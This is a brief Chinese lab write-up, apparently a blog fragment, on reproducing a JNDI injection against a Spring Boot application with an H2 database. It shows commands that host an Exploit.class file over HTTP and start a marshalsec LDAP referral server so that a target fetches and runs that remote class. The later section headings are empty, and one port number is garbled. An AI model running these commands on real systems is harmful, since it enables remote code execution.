环境搭建
spring boot + h2环境
代码:https://github.com/felix1982/spring-boot-
practice/tree/master/spring-boot-h2
远程jndi server
1
2
3
4$ tree
.
└── Exploit.class
$ python -m SimpleHTTPServer 80001
$java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://0.0.0.0:8000/#Exploit
connect复现
分析
调用栈
问题代码